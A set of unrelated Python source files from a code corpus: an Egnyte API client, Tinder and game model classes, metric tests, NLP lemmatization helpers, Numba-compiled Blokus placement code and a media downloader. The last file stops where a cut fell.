* idpUserId: Only required if the user is SSO authenticated and not using default user mapping. Do not specify if user is not SSO authenticated. This is the way the user is identified within the SAML Response from an SSO Identity Provider, i.e. the SAML Subject (e.g. jsmith)
* userPrincipalName: Do not specify if user is not AD authenticated. Used to bind child authentication policies to a user when using Active Directory authentication in a multi-domain setup (e.g. <EMAIL>)
Returns created User object.
"""
url = self._client.get_url(self._url_template)
data = base.filter_none_values(dict(userName=userName, externalId=externalId, email=email,
name=dict(familyName=familyName, givenName=givenName), active=active, sendInvite=sendInvite, authType=authType,
userType=userType, role=role, idpUserId=idpUserId, userPrincipalName=userPrincipalName))
json = exc.created.check_json_response(self._client.POST(url, data))
return User(self._client, **json)
class PermissionSet(object):
"""Wrapper for a permission set"""
def __init__(self, json):
self._users = json.get('users', ())
self._groups = json.get('groups', ())
self._unpack()
def _unpack(self):
self.user_to_permission = {}
self.group_to_permission = {}
self.permission_to_owner = collections.defaultdict(lambda: dict(users=set(), groups=set()))
for d in self._users:
self.user_to_permission[d['subject']] = d['permission']
self.permission_to_owner[d['permission']]['users'].add(d['subject'])
for d in self._groups:
self.group_to_permission[d['subject']] = d['permission']
self.permission_to_owner[d['permission']]['groups'].add(d['subject'])
class Notes(base.HasClient):
"""
Notes management API
"""
_url_template = "pubapi/v1/notes"
def create(self, path, message):
"""
Create a new note.
Parameters:
* path - path to the file the note is about
* message - contents of the note
Returns the created Note object.
"""
url = self._client.get_url(self._url_template)
data = dict(path=path, body=message)
json = exc.created.check_json_response(self._client.POST(url, data))
return Note(self._client, **json)
def list(self, file=None, folder=None, start_time=None, end_time=None):
"""
List existing notes.
Optional filtering parameters:
* start_time: Get notes created after start_time (datetime.date or string in 'YYYY-MM-DD' format)
* file: Get only notes attached to a specific file (path).
* folder: Get only notes atatched to files in specific folder (path).
* end_time: Get notes created before end_time (datetime.date or string in 'YYYY-MM-DD' format)
Returns list of Note objects, with additional attributes total_count and offset.
"""
url = self._client.get_url(self._url_template)
params = base.filter_none_values(dict(file=file, folder=folder, start_time=base.date_format(start_time),
end_time=base.date_format(end_time)))
json = exc.default.check_json_response(self._client.GET(url, params=params))
return base.ResultList((Note(self._client, **d) for d in json.pop('notes', ())), json['total_results'], json['offset'])
class Groups(base.HasClient):
"""
Group Management API
"""
_url_template = "pubapi/v2/groups"
def list(self, displayName=None, startIndex=None, count=None):
"""
List existing groups.
Optional filtering parameters:
* displayName: Filter by name of the group. This may contain '*' wildcards at beginning for prefix search or both at beginning and end for contains search.
Returns list of Group objects, with additional attributes total_result and offset
"""
params = base.filter_none_values(dict(startIndex=startIndex, count=count))
if displayName:
if displayName.startswith('*'):
op = 'co' if displayName.endswith('*') else 'sw'
else:
op = 'eq'
params['filter'] = [u'displayName %s "%s"' % (op, displayName.strip('*'))]
url = self._client.get_url(self._url_template)
json = exc.default.check_json_response(self._client.GET(url, params=params))
return base.ResultList((Group(self._client, **d) for d in json.pop('resources', ())), json['totalResults'], json['startIndex'] - 1)
def create(self, displayName, members=None):
"""
Create a new Group. Parameters:
* displayName: Name of the group (string). Required
* members: List of members to be added to the new group (user ids or User objects). Optional.
Returns created Group object.
"""
url = self._client.get_url(self._url_template)
data = dict(displayName=displayName)
if members is not None:
data['members'] = [dict(value=x.id if isinstance(x, User) else x) for x in members]
json = exc.created.check_json_response(self._client.POST(url, data))
return Group(self._client, **json)
def get(self, id):
"""Get a Group object by id. Does not check if Group exists."""
return Group(self._client, id=id)
def by_displayName(self, displayName):
"""Get a Group object by displayName. Returns None if Group does not exist"""
try:
return self.list(displayName=displayName)[0]
except LookupError:
pass
class SearchMatch(base.HasClient):
"""
Single match from search results.
Attributes for a file match:
* name The name of the file.
* path The path to the file in Egnyte.
* type The MIME type of the file.
* size The size of the file in bytes.
* snippet A plain text snippet of the text containing the matched content.
* snippet_html An HTML formatted snippet of the text containing the matched content.
* entry_id A GUID for tha particular instance of a file.
* last_modified The ISO-8601 formatted timestamp representing the last modified date of the file.
* uploaded_by The formatted name of the user who uploaded the file.
* uploaded_by_username The username of the user who uploaded the file.
* num_versions The number of versions of the file available.
* is_folder A boolean value stating if the object is a file or folder. Please note that, currently, this API only returns file objects.
"""
def file(self):
"""Get File object that correspons to this search match, or None if found resource is not a File"""
if not self.is_folder:
return File(self._client, name=self.name, path=self.path, is_folder=self.is_folder, num_versions=self.num_versions,
entry_id=self.entry_id, uploaded_by=self.uploaded_by, size=self.size, last_modified=self.last_modified)
class Search(base.HasClient):
"""Search API"""
_url_template = "pubapi/v1/search"
def files(self, query, offset=None, count=None, folder=None, modified_after=None, modified_before=None):
"""
Search for files.
Parameters:
* query The search string you want to find. * is supported as a postfix wildcard, AND and OR as bool operations and double quotes for phrase search.
* offset The 0-based index of the initial record being requested (Integer >= 0).
* count The number of entries per page (min 1, max 100)
* folder Limit the result set to only items contained in the specified folder.
* modified_before Limit to results before the specified ISO-8601 timestamp (datetime.date object or string).
* modified_after Limit to results after the specified ISO-8601 timestamp (datetime.date object or string).
Returns list of SearchMatch objects, with additional attributes total_count and offset.
"""
url = self._client.get_url(self._url_template)
params = base.filter_none_values(dict(
query=query,
offset=offset,
count=count,
folder=folder,
modified_after=base.date_format(modified_after),
modified_before=base.date_format(modified_before))
)
json = exc.default.check_json_response(self._client.GET(url, params=params))
return base.ResultList((SearchMatch(self._client, **d) for d in json.get('results', ())), json['total_count'], json['offset'])
|
StarcoderdataPython
|
3394084
|
<filename>pynder/models/user.py
import dateutil.parser
from datetime import date
from .. import constants
from six import text_type
from .message import Message
class User(object):
def __init__(self, data, session):
self._session = session
self._data = data
self.id = data['_id']
SIMPLE_FIELDS = ("name", "bio", "birth_date", "ping_time")
for f in SIMPLE_FIELDS:
setattr(self, f, data[f])
self.photos_obj = [p for p in data['photos']]
self.birth_date = dateutil.parser.parse(self.birth_date)
self.schools = []
self.jobs = []
try:
self.schools.extend([school["name"] for school in data['schools']])
self.jobs.extend(["%s @ %s" % (job["title"]["name"], job["company"][
"name"]) for job in data['jobs'] if 'title' in job and 'company' in job])
self.jobs.extend(["%s" % (job["company"]["name"],) for job in data[
'jobs'] if 'title' not in job and 'company' in job])
self.jobs.extend(["%s" % (job["title"]["name"],) for job in data[
'jobs'] if 'title' in job and 'company' not in job])
except ValueError:
pass
@property
def instagram_username(self):
if self._data.get("instagram", False):
return self._data['instagram']['username']
@property
def instagram_photos(self):
if self._data.get("instagram", False):
return [p for p in self._data['instagram']['photos']]
@property
def gender(self):
return constants.GENDER_MAP[int(self._data['gender'])]
@property
def common_interests(self):
return [p for p in self._data['common_interests']]
@property
def common_connections(self):
return [p for p in self._data['common_connections']]
@property
def thumbnails(self):
return self.get_photos(width="84")
@property
def photos(self):
return self.get_photos()
@property
def distance_km(self):
if self._data.get("distance_mi", False) or self._data.get("distance_km", False):
return self._data.get('distance_km', self._data['distance_mi'] * 1.60934)
else:
return 0
@property
def age(self):
today = date.today()
return (today.year - self.birth_date.year -
((today.month, today.day) <
(self.birth_date.month, self.birth_date.day)))
def __unicode__(self):
return u"{n} ({a})".format(n=self.name, a=self.age)
def __str__(self):
return text_type(self).encode('utf-8')
def __repr__(self):
return repr(self.name)
def report(self, cause):
return self._session._api.report(self.id, cause)
def get_photos(self, width=None):
photos_list = []
for photo in self.photos_obj:
if width is None:
photos_list.append(photo.get("url"))
else:
sizes = ["84", "172", "320", "640"]
if width not in sizes:
print("Only support these widths: %s" % sizes)
return None
for p in photo.get("processedFiles", []):
if p.get("width", 0) == int(width):
photos_list.append(p.get("url", None))
return photos_list
class Hopeful(User):
def like(self):
return self._session._api.like(self.id)['match']
def superlike(self):
return self._session._api.superlike(self.id)['match']
def dislike(self):
return self._session._api.dislike(self.id)
class Match(object):
def __init__(self, match, _session):
self._session = _session
self.id = match["_id"]
self.user, self.messages = None, []
if 'person' in match:
user_data = _session._api.user_info(
match['person']['_id'])['results']
user_data['_id'] = match['person']['_id']
self.user = User(user_data, _session)
self.messages = [Message(m, user=self.user)
for m in match['messages']]
def message(self, body):
return self._session._api.message(self.id, body)['_id']
def delete(self):
return self._session._api._request('DELETE', '/user/matches/' + self.id)
def __repr__(self):
return "<Unnamed match>" if self.user is None else repr(self.user)
|
StarcoderdataPython
|
1623086
|
<reponame>acolley/protoactor-python
import asyncio
from datetime import timedelta
from threading import Thread
class AsyncTimer(Thread):
def __init__(self, interval: timedelta, function, args=None, kwargs=None):
super().__init__()
self.interval = interval
self.function = function
self.args = args if args is not None else []
self.kwargs = kwargs if kwargs is not None else {}
self.loop = None
self._task = None
self._cancelled = False
def run(self):
self.loop = asyncio.new_event_loop()
loop = self.loop
asyncio.set_event_loop(loop)
try:
self._task = asyncio.ensure_future(self._job())
loop.run_until_complete(self._task)
finally:
loop.close()
def cancel(self):
if self.loop is not None:
self._cancelled = True
async def _job(self):
await asyncio.sleep(self.interval.total_seconds())
if not self._cancelled:
await self.function(*self.args, **self.kwargs)
|
StarcoderdataPython
|
4801767
|
import os
# In the template we named it `gitignore` so it does not interfere with
# the templates `.gitignore`.
# Rename gitignore -> .gitignore
os.rename("gitignore", ".gitignore")
|
StarcoderdataPython
|
45834
|
<filename>segeval/ml/test.py
'''
Tests the machine learning (ML) statistics functions, and ml package.
.. moduleauthor:: <NAME> <<EMAIL>>
'''
from __future__ import absolute_import
import unittest
from decimal import Decimal
from segeval.ml import (
__precision__, precision, __recall__, recall, __fmeasure__,
fmeasure, ConfusionMatrix as cm, Average)
from segeval.util import SegmentationMetricError
class TestConfusionMatrix(unittest.TestCase):
'''
Confusion matrix tests.
'''
def test_matrix_set_add(self):
'''
Test matrix.
'''
matrix = cm()
matrix['p']['p'] += 2
matrix['p']['n'] = 3
self.assertEqual(matrix['p']['p'], 2)
self.assertEqual(matrix['p']['n'], 3)
self.assertEqual(matrix['p']['f'], 0)
self.assertEqual(matrix['a']['b'], 0)
def test_setitem(self):
'''
Ensure that __setitem__ raises an AttributeError
'''
exception = False
matrix = cm()
try:
matrix['a'] = 0
except AttributeError:
exception = True
self.assertTrue(exception, 'AttributeError not raised')
def test_matrix_classes(self):
'''
Test matrix.
'''
matrix = cm()
matrix['p']['p'] += 2
matrix['p']['n'] = 3
self.assertEqual(matrix['p']['p'], 2)
self.assertEqual(matrix['p']['n'], 3)
self.assertEqual(matrix['p']['f'], 0)
self.assertEqual(matrix['a']['b'], 0)
self.assertEqual(matrix.classes(), set(['p', 'n', 'a', 'b', 'f']))
class TestML(unittest.TestCase):
'''
Machine-learning metric tests.
'''
def test_precision(self):
'''
Test precision.
'''
matrix = cm()
matrix['p']['p'] += 1
matrix['p']['f'] += 1
self.assertEqual(__precision__(matrix, 'p'), Decimal('0.5'))
self.assertEqual(__precision__(matrix, 'f'), Decimal('0'))
self.assertEqual(
precision(matrix, version=Average.micro), Decimal('0.5'))
self.assertEqual(
precision(matrix, version=Average.macro), Decimal('0.25'))
matrix = cm()
matrix['p']['p'] += 1
matrix['p']['f'] += 3
matrix['f']['p'] += 1
self.assertEqual(
precision(matrix, version=Average.micro), Decimal('0.2'))
self.assertEqual(
precision(matrix, version=Average.macro), Decimal('0.125'))
self.assertEqual(__precision__(matrix, 'p'), Decimal('0.25'))
self.assertEqual(__precision__(matrix, 'f'), Decimal('0'))
matrix = cm()
matrix['p']['p'] += 5
matrix['p']['f'] += 2
matrix['f']['p'] += 1
matrix['f']['f'] += 2
self.assertEqual(
precision(matrix, version=Average.micro), Decimal('0.7'))
self.assertAlmostEqual(precision(matrix, version=Average.macro),
Decimal('0.69047'), 4)
self.assertAlmostEqual(__precision__(matrix, 'p'),
Decimal('0.71428'), 4)
self.assertAlmostEqual(__precision__(matrix, 'f'),
Decimal('0.66666'), 4)
matrix = cm()
matrix['p']['f'] += 2
self.assertEqual(precision(matrix), Decimal('0'))
self.assertEqual(__precision__(matrix, 'p'), Decimal('0'))
self.assertEqual(__precision__(matrix, 'f'), Decimal('0'))
matrix = cm()
matrix['p']['p'] += 2
self.assertEqual(precision(matrix), Decimal('1'))
self.assertEqual(__precision__(matrix, 'p'), Decimal('1'))
self.assertEqual(__precision__(matrix, 'f'), Decimal('0'))
matrix = cm()
self.assertEqual(precision(matrix), Decimal('0'))
self.assertEqual(__precision__(matrix, 'p'), Decimal('0'))
self.assertEqual(__precision__(matrix, 'f'), Decimal('0'))
def test_recall(self):
'''
Test recall.
'''
matrix = cm()
matrix['p']['p'] += 1
matrix['p']['f'] += 1
self.assertEqual(__recall__(matrix, 'p'), Decimal('1.0'))
self.assertEqual(__recall__(matrix, 'f'), Decimal('0'))
self.assertEqual(recall(matrix, version=Average.micro), Decimal('0.5'))
self.assertEqual(recall(matrix, version=Average.macro), Decimal('0.5'))
matrix = cm()
matrix['p']['p'] += 1
matrix['p']['f'] += 3
matrix['f']['p'] += 1
self.assertEqual(recall(matrix, version=Average.micro), Decimal('0.2'))
self.assertEqual(
recall(matrix, version=Average.macro), Decimal('0.25'))
self.assertEqual(__recall__(matrix, 'p'), Decimal('0.5'))
self.assertEqual(__recall__(matrix, 'f'), Decimal('0'))
matrix = cm()
matrix['p']['p'] += 5
matrix['p']['f'] += 2
matrix['f']['p'] += 1
matrix['f']['f'] += 2
self.assertEqual(recall(matrix, version=Average.micro), Decimal('0.7'))
self.assertAlmostEqual(recall(matrix, version=Average.macro),
Decimal('0.66666'), 4)
self.assertAlmostEqual(__recall__(matrix, 'p'),
Decimal('0.83333'), 4)
self.assertAlmostEqual(__recall__(matrix, 'f'),
Decimal('0.5'), 4)
matrix = cm()
matrix['p']['f'] += 2
self.assertEqual(recall(matrix), Decimal('0'))
self.assertEqual(__recall__(matrix, 'p'), Decimal('0'))
self.assertEqual(__recall__(matrix, 'f'), Decimal('0'))
matrix = cm()
matrix['p']['p'] += 2
self.assertEqual(recall(matrix), Decimal('1'))
self.assertEqual(__recall__(matrix, 'p'), Decimal('1'))
self.assertEqual(__recall__(matrix, 'f'), Decimal('0'))
matrix = cm()
self.assertEqual(recall(matrix), Decimal('0'))
self.assertEqual(__recall__(matrix, 'p'), Decimal('0'))
self.assertEqual(__recall__(matrix, 'f'), Decimal('0'))
def test_fmeasure(self):
'''
Test FMeasure.
'''
matrix = cm()
matrix['p']['p'] += 1
matrix['p']['f'] += 1
self.assertAlmostEqual(
__fmeasure__(matrix, 'p'), Decimal('0.66666'), 4)
self.assertEqual(__fmeasure__(matrix, 'f'), Decimal('0'))
self.assertAlmostEqual(fmeasure(matrix, version=Average.micro),
Decimal('0.66666'), 4)
self.assertAlmostEqual(fmeasure(matrix, version=Average.macro),
Decimal('0.33333'), 4)
self.assertAlmostEqual(fmeasure(matrix, classification='p'),
Decimal('0.66666'), 4)
matrix = cm()
matrix['p']['p'] += 1
matrix['p']['f'] += 3
matrix['f']['p'] += 1
self.assertAlmostEqual(fmeasure(matrix, version=Average.micro),
Decimal('0.33333'), 4)
self.assertAlmostEqual(fmeasure(matrix, version=Average.macro),
Decimal('0.16666'), 4)
self.assertAlmostEqual(__fmeasure__(matrix, 'p'),
Decimal('0.33333'), 4)
self.assertAlmostEqual(fmeasure(matrix, classification='p'),
Decimal('0.33333'), 4)
self.assertEqual(__fmeasure__(matrix, 'f'), Decimal('0'))
matrix = cm()
matrix['p']['p'] += 5
matrix['p']['f'] += 2
matrix['f']['p'] += 1
matrix['f']['f'] += 2
self.assertAlmostEqual(fmeasure(matrix, version=Average.micro),
Decimal('0.68421'), 4)
self.assertAlmostEqual(fmeasure(matrix, version=Average.macro),
Decimal('0.67032'), 4)
self.assertAlmostEqual(__fmeasure__(matrix, 'p'),
Decimal('0.76923'), 4)
self.assertAlmostEqual(__fmeasure__(matrix, 'f'),
Decimal('0.57142'), 4)
matrix = cm()
matrix['p']['f'] += 2
self.assertEqual(fmeasure(matrix), Decimal('0'))
self.assertEqual(__fmeasure__(matrix, 'p'), Decimal('0'))
self.assertEqual(__fmeasure__(matrix, 'f'), Decimal('0'))
matrix = cm()
matrix['p']['p'] += 2
self.assertEqual(fmeasure(matrix), Decimal('1'))
self.assertEqual(__fmeasure__(matrix, 'p'), Decimal('1'))
self.assertEqual(__fmeasure__(matrix, 'f'), Decimal('0'))
matrix = cm()
self.assertEqual(fmeasure(matrix), Decimal('0'))
self.assertEqual(__fmeasure__(matrix, 'p'), Decimal('0'))
self.assertEqual(__fmeasure__(matrix, 'f'), Decimal('0'))
def test_exception_on_incorrect_average(self):
'''
Test exception on incorrect average.
'''
matrix = cm()
matrix['p']['p'] += 1
matrix['p']['f'] += 1
self.assertRaises(
SegmentationMetricError, fmeasure, matrix, version='incorrect')
|
StarcoderdataPython
|
84180
|
import warnings
warnings.warn("pandas.types.common is deprecated and will be "
"removed in a future version, import "
"from pandas.api.types",
DeprecationWarning, stacklevel=3)
from pandas.core.dtypes.common import * # noqa
|
StarcoderdataPython
|
123707
|
<filename>src/week_5/features/process_text/lemmatization.py
from nltk import pos_tag, word_tokenize
from nltk.corpus import wordnet
from nltk.stem import WordNetLemmatizer
def is_noun(tag):
return tag in ['NN', 'NNS', 'NNP', 'NNPS']
def is_verb(tag):
return tag in ['VB', 'VBD', 'VBG', 'VBN', 'VBP', 'VBZ']
def is_adverb(tag):
return tag in ['RB', 'RBR', 'RBS']
def is_adjective(tag):
return tag in ['JJ', 'JJR', 'JJS']
def penn_to_wn(tag):
if is_adjective(tag):
return wordnet.ADJ
elif is_noun(tag):
return wordnet.NOUN
elif is_adverb(tag):
return wordnet.ADV
elif is_verb(tag):
return wordnet.VERB
return None
def lemma_tokens(tokens, wnl):
lemmas = []
for item in tokens:
pos = pos_tag([item])[0][1]
ptw = penn_to_wn(pos)
if ptw is None:
lemmas.append(wnl.lemmatize(item))
else:
lemmas.append(wnl.lemmatize(item, ptw))
return lemmas
def tokenize(text):
wnl = WordNetLemmatizer()
tokens = word_tokenize(text)
lemmas = lemma_tokens(tokens, wnl)
return lemmas
def lemmatization(dataset):
dataset_lemma = list()
for doc in dataset:
doc_lemmas = tokenize(doc)
c_doc = ''
for token in doc_lemmas:
c_doc += token + ' '
dataset_lemma.append(c_doc.strip())
return dataset_lemma
|
StarcoderdataPython
|
1707796
|
<reponame>tarnover/tencentcloud-cli<gh_stars>0
version = "2018-05-22"
|
StarcoderdataPython
|
173007
|
import unittest
from pysapets.ox import Ox
from pysapets.animal import Animal
import pysapets.constants as constants
from unittest.mock import patch
from io import StringIO
from copy import deepcopy
class OxTest(unittest.TestCase):
def setUp(self):
self.ox = Ox()
self.friends = [self.ox, Animal(2, 2), Animal(2, 2), Animal(2, 2), Animal(2, 2)]
# test that get_type returns the correct type
def test_get_type(self):
self.assertEqual(self.ox.get_type(), constants.OX)
# test that ox starts with base health of 4
def test_get_health(self):
self.assertEqual(self.ox.get_health(), 4)
# test that ox starts with base attack of 1
def test_get_attack(self):
self.assertEqual(self.ox.get_attack(), 1)
# test that initializing ox with additional health increases health
def test_init_add_health(self):
newOx = Ox(addHealth = 3)
self.assertEqual(newOx.get_health(), 4 + 3)
# test that initializing an ox with additional attack increases attack
def test_init_add_attack(self):
newOx = Ox(addAttack = 3)
self.assertEqual(newOx.get_attack(), 1 + 3)
# test that initializing ox with additional health and attack increases health and attack
def test_init_add_health_attack(self):
newOx = Ox(addHealth = 3, addAttack = 3)
self.assertEqual(newOx.get_health(), 4 + 3)
self.assertEqual(newOx.get_attack(), 1 + 3)
# test that ox ability has correct trigger
def test_get_ability_trigger(self):
self.assertEqual(self.ox.get_ability_trigger(), constants.FAINT)
# test that ox ability has correct triggeredBy
def test_get_ability_triggeredBy(self):
self.assertEqual(self.ox.get_ability_triggeredBy(), constants.FRIEND_AHEAD)
# TODO add relevant tests for ox ability
def test_run_ability(self):
pass
def test_run_ability_level_1(self):
pass
def test_run_ability_level_2(self):
pass
def test_run_ability_level_3(self):
pass
|
StarcoderdataPython
|
3314088
|
'''
Author: <NAME>
Date: 3/15/19
Summary:
- Contains computation methods that board.py uses to
manage valid move seeks and piece placement.
- Methods use Numba with jit decorator that precompiles
types and makes runtime faster than normal python.
'''
from numba import jit
import numpy as np
import math
# def dummy_jit(*args, **kwargs):
# def dumdum(f):
# return f
# return dumdum
#
# jit = dummy_jit
#### METHODS FOR check_shifted() ####
@jit("UniTuple(int64, 2)(UniTuple(int64, 2), UniTuple(int64, 2), double)", nopython=True) # "int(int64, ...)"
def rotate_by_deg(index, offset_point, angle):
''' Rotates each point on piece around the index by the given angle
'''
ox, oy = index
px, py = offset_point
new_x = ox + math.cos(angle) * (px - ox) - math.sin(angle) * (py - oy)
new_y = oy + math.sin(angle) * (px - ox) + math.cos(angle) * (py - oy)
return int(round(new_x, 1)), int(round(new_y, 1))
@jit("UniTuple(int64, 2)(UniTuple(int64, 2), int64, int64)", nopython=True)
def flip_piece_x(index, x, y):
''' Takes the difference between index x and point x, then applies reverse
difference to the index point. y stays the same
'''
return index[0] - (index[0] - x) * -1, y
@jit("UniTuple(int64, 2)(UniTuple(int64, 2), int64, int64)", nopython=True)
def flip_piece_y(index, x, y):
''' Takes the difference between index y and point y, then applies reverse
difference to the index point. x stays the same
'''
return x, index[1] + (y - index[1]) * -1
@jit("UniTuple(int64, 2)(UniTuple(int64, 2), int64, int64, unicode_type)", nopython=True)
def rotate_piece(index, x_offset, y_offset, piece_orientation):
''' Description: Orients piece around the index point
Parameters:
index: int tuple that specifies the index coordinate on the board (the coord the piece will rotate around)
offset: int tuple that specifies the offset from the index coord for the current cell
piece_orientation: string specifying what new orientation you want the point at
Returns:
2 ints x and y that are the new rotated piece coords
'''
piece_orientation = piece_orientation[:-1] # Takes out last character specifying the shift id (not needed in this method)
x_offset += index[0] # calculates the actual x coord on board
y_offset += index[1] # calculates the actual y coord on board
if piece_orientation == "north":
return rotate_by_deg(index, (x_offset, y_offset), math.radians(270))
elif piece_orientation == "northwest":
new_x, new_y = rotate_by_deg(index, (x_offset, y_offset), math.radians(270))
return flip_piece_x(index, new_x, new_y)
elif piece_orientation == "south":
return rotate_by_deg(index, (x_offset, y_offset), math.radians(90))
elif piece_orientation == "southeast":
new_x, new_y = rotate_by_deg(index, (x_offset, y_offset), math.radians(90))
return flip_piece_x(index, new_x, new_y)
elif piece_orientation == "west":
return rotate_by_deg(index, (x_offset, y_offset), math.radians(180))
elif piece_orientation == "southwest":
new_x, new_y = rotate_by_deg(index, (x_offset, y_offset), math.radians(180))
return flip_piece_y(index, new_x, new_y)
elif piece_orientation == "northeast":
new_x, new_y = rotate_by_deg(index, (x_offset, y_offset), math.radians(0))
return flip_piece_y(index, new_x, new_y)
else: # Default orientation (East)
return rotate_by_deg(index, (x_offset, y_offset), math.radians(0))
@jit("boolean(int64[:, ::1], int64, int64, int64)", nopython=True)
def is_valid_adjacents(board_contents, y, x, player_color):
''' Description: Invalid coord if left, right, bottom, or top cell is the same color as the current player.
Parameters:
board_contents: 20 by 20 numpy matrix representing the current state of the board
x: int x coord of the cell
y: int y coord of the cell
player_color: int representing current player color
Returns:
bool indicating whether the cell is a valid adjacent
'''
valid_adjacent = True
# Excludes top board edge from top cell check
if y != 0:
if board_contents[y - 1][x] == player_color:
valid_adjacent = False
# Excludes left board edge from left cell check
if x != 0:
if board_contents[y][x - 1] == player_color:
valid_adjacent = False
# Excludes bottom board edge from bottom cell check
if y != 19:
if board_contents[y + 1][x] == player_color:
valid_adjacent = False
# Excludes right board edge from right cell check
if x != 19:
if board_contents[y][x + 1] == player_color:
valid_adjacent = False
return valid_adjacent
@jit("boolean(int64[:, ::1], int64, int64, int64)", nopython=True)
def is_valid_cell(board_contents, x, y, player_color):
''' Description: If the cell x, y is empty, has no adjacent cells that are the same color,
and is not out of bounds of the 20x20 board, then the cell is valid
to put a part of a piece on it.
Parameters:
board_contents: 20 by 20 numpy matrix representing the current state of the board
x: int x coord of the cell
y: int y coord of the cell
player_color: int representing current player color
Returns:
bool indicating whether the cell is a valid cell
'''
# Out of bounds check
if x < 0 or x >= 20 or y < 0 or y >= 20:
return False
# Checks if cell is empty and a valid adjacent
if (board_contents[y][x] == 0 and is_valid_adjacents(board_contents, y, x, player_color)):
return True
else:
return False
@jit("int64[:](int64[:, ::1], int64, UniTuple(int64, 2), unicode_type, int64[:, :, ::1])", nopython=True)
def check_shifted(board_contents, player_color, index, orientation, shifted_offsets):
''' Description: Shifts entire piece N times were N is how many cells the piece takes up.
All shifted offsets are checked for the current orientation to see whether
the shifted set of offsets is a valid move.
Parameters:
board_contents: 20 by 20 numpy matrix representing the current state of the board
played_color: int representing current player color
index: int tuple that specifies the index coordinate on the board (the coord the piece will rotate around)
orientation: string specifying which orientation is being checked
shifted_offsets: list of a list of tuples where each element in the main list represents a different set of coords
for a shifted piece.
Returns:
Returns the list of ints representing the shifted offsets ids where the piece can be
placed at that set of shifted offsets
'''
shifted_ids = np.zeros(shifted_offsets.shape[0], np.int64)
num_items = 0
for shifted_id in range(shifted_offsets.shape[0]): # Shift piece N times where N is the number of cells in the piece
valid_placement = True
for offset_id in range(shifted_offsets.shape[1]):
offset = shifted_offsets[shifted_id, offset_id, :]
if offset[0] == 0 and offset[1] == 0: # No need to rotate coord since its the index and there is no offset
if not is_valid_cell(board_contents, index[0], index[1], player_color):
valid_placement = False
else:
new_piece = rotate_piece(index, offset[0], offset[1], orientation)
new_x = new_piece[0]
new_y = new_piece[1]
if not is_valid_cell(board_contents, new_x, new_y, player_color):
valid_placement = False
if valid_placement:
shifted_ids[num_items] = shifted_id
num_items += 1
return shifted_ids[:num_items]
#### METHODS FOR get_all_shifted_offsets() ####
@jit("int64[:, ::1](int64[:, ::1], unicode_type)", nopython=True)
def rotate_default_piece(offsets, orientation):
''' Description: Rotates the initial default piece orientation for shifting.
Parameters:
offsets: numpy array of tuples indicated all corresponding offsets to a specific piece type
orientation: string indicating the orientation to rotate the offset pieces
Returns:
numpy list of all offsets for given orientation
'''
orientation_offsets_to_shift = np.zeros((len(offsets), 2), np.int64)
for index in range(len(offsets)):
if offsets[index][0] == 0 and offsets[index][1] == 0:
orientation_offsets_to_shift[index, :] = (0, 0)
else:
new_coord = rotate_piece((0, 0), offsets[index][0], offsets[index][1], orientation + "!") # adding dummy character to end since rotate ignores last character of orientation
orientation_offsets_to_shift[index, :] = (new_coord[0], new_coord[1])
return orientation_offsets_to_shift
@jit("int64[:, ::1](int64[:, ::1], int64)", nopython=True)
def shift_offsets(offsets, offset_id):
''' Description: Shifts the offsets so that the offset that corresponds to the offset_id is the new index
Parameters:
offsets: numpy array of tuples containing the coords of offsets needing do be shifted
offset_id: identifies which coord becomes the new index in the list of offsets
Returns:
numpy array of tuples containing the newly shifted offsets
'''
shifted_offsets = np.zeros((len(offsets), 2), np.int64)
if offset_id == 0: # No need to shift the offsets for the default piece shape defined in the global space
return offsets
new_origin_y_diff = offsets[offset_id][0]
new_origin_x_diff = offsets[offset_id][1]
for index in range(len(offsets)):
shifted_offsets[index, :] = (offsets[index][0] - new_origin_y_diff, offsets[index][1] - new_origin_x_diff)
return shifted_offsets
@jit("int64[:, :, ::1](int64[:, ::1], unicode_type)", nopython=True)
def get_all_shifted_offsets(offsets, orientation):
''' Description: Compiles a list of all shifted offsets for a piece at a specific orientation.
Returns a numpy array, which is a list of a list of tuples which each contain
a shifted offset.
Parameters:
offsets: numpy array of tuples containing the coords of offsets needing do be shifted
orientation: string specifying the orientation that the shifts should take place
Returns:
list of all shifted orientations a piece can make at a given orientation
'''
orientation_offsets_to_shift = rotate_default_piece(offsets, orientation)
shifted_offsets = np.zeros((len(offsets), len(orientation_offsets_to_shift), 2), np.int64)
for offset_id in range(len(orientation_offsets_to_shift)):
shifted_offsets[offset_id] = shift_offsets(orientation_offsets_to_shift, offset_id)
return shifted_offsets
|
StarcoderdataPython
|
1615799
|
from django.contrib.auth.decorators import login_required
from django.utils.translation import ugettext as _
from questionnaire.views import generic_questionnaire_view_step
@login_required
def questionnaire_view_step(request, identifier, step):
"""
View rendering the form of a single step of a new Climate Change Adaptation
questionnaire in read-only mode.
"""
return generic_questionnaire_view_step(
request, identifier, step, 'cca',
page_title=_('Climate Change Adaptation'))
|
StarcoderdataPython
|
3321529
|
"""
Stepper configuration for verbose output
"""
debuglevel = 1 # 1: print HTTP headers, 0: don't print
show_page = True
|
StarcoderdataPython
|
4823092
|
import math
import random
import time
import subprocess
from datetime import datetime, timedelta
import freesound
import giphy_client
import requests
from giphy_client.rest import ApiException
from googleapiclient.discovery import build
from pafy import pafy
from pixabay import Image
from tqdm import tqdm
import config
import utils
logger = config.set_logger('Downloaders.py')
def store(litter_id, url, type):
logger.info('Storing media...')
end_point = config.BASE_URL + '/content/'
task = {
'litter_id': litter_id,
'url': url,
'type': type,
}
return requests.post(end_point, json=task, auth=config.AUTH)
def downloader(url, download_path):
logger.info('Inside downloader...')
r = requests.get(url, stream=True)
logger.info('status_code: ' + str(r.status_code))
logger.info('reason: ' + str(r.reason))
total_size = int(r.headers.get('content-length', 0))
block_size = 1024
total_bytes = math.ceil(total_size // block_size)
progress = 0
with open(download_path, 'wb') as f:
for data in tqdm(r.iter_content(block_size), total=total_bytes, unit='B'):
f.write(data)
progress += 1
percent_downloaded = round((progress / total_bytes) * 100)
if config.GLOBAL_DOWNLOAD_TRACKER != percent_downloaded:
if percent_downloaded > 100:
config.GLOBAL_DOWNLOAD_TRACKER = 100
else:
config.GLOBAL_DOWNLOAD_TRACKER = percent_downloaded
task = {'download': config.GLOBAL_DOWNLOAD_TRACKER}
utils.update_script(task)
time.sleep(.1)
f.close()
def generate_interval(video, duration):
logger.info('Generating interval')
cuts = [3, 5, 7, 10, 12]
start_minute = random.randint(0, duration.minute - 1)
start_second = random.randint(0, 59)
interval = random.choice(cuts)
return valid_interval(video.title, duration, start_minute, start_second, interval)
def valid_interval(title, duration, minute, second, interval):
logger.info('Validating interval...')
time_string = '0:' + str(minute) + ':' + str(second)
